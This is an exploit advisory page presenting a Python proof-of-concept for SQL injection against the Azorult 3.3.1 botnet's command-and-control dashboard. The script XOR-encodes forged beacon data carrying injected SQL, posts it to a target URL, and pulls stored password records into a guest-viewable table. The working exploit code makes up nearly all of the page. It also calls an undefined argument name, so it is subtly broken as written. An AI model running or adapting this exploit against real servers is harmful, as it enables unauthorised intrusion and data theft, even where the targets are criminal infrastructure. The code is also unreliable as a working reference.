AZORult Botnet SQL Injection

2019.08.13
Credit: prsecurity
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

import requests import argparse import base64 # Azorult 3.3.1 C2 SQLi by prsecurity # For research purposes only. Don't pwn what you don't own. # change GUID and XOR key to specific beacon, can be extracted from a sample guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F" key = "\x03\x55\xae" def get_args(): parser = argparse.ArgumentParser( prog="azorult_sploit.py", formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50), epilog= ''' This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard. ''') parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)") parser.add_argument("-n", "--id_record", default="1", help="id of record to dump") parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)") args = parser.parse_args() return args def CB_XORm(data, key): j=0 key = list(key) data = list(data) tmp = list() for i in range(len(data)): tmp.append(chr(ord(data[i])^ord(key[j]))) j += 1 if j > (len(key)-1): j = 0 return "".join(tmp) def pwn_target(target, num_records, proxy): requests.packages.urllib3.disable_warnings() proxies = {'http': proxy, 'https': proxy} try: r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies) print("[*] Your IP: {}".format(r.text)) headers = { "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" } print('[+] Getting URL, LOGIN AND PASS') data = [ "|".join([ "1","2","3","4","5","6","7","8","9","10","11","12" ]), "\r\n".join([ "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)]) ]), "c", "d", ":".join(["'11","22"]) ] payload = CB_XORm(guid.join(data), key) r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies) if r.text != "OK": print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?") raise print('[+] Getting LOGIN/PASS') data = [ "|".join([ "1","2","3","4","5","6","7","8","9","10","11","12" ]), "\r\n".join([ "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)]) ]), "c", "d", ":".join(["'11","22"]) ] payload = CB_XORm(guid.join(data), key) r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies) if r.text != "OK": print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?") raise print('[+] If this worked, you will see two new records in password table at guest.php') except: print("[-] ERROR: Something went wrong.") print(r.text) raise def main(): print () print ('Azorult 3.3.1 SQLi by prsecurity') args = get_args() pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip()) if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top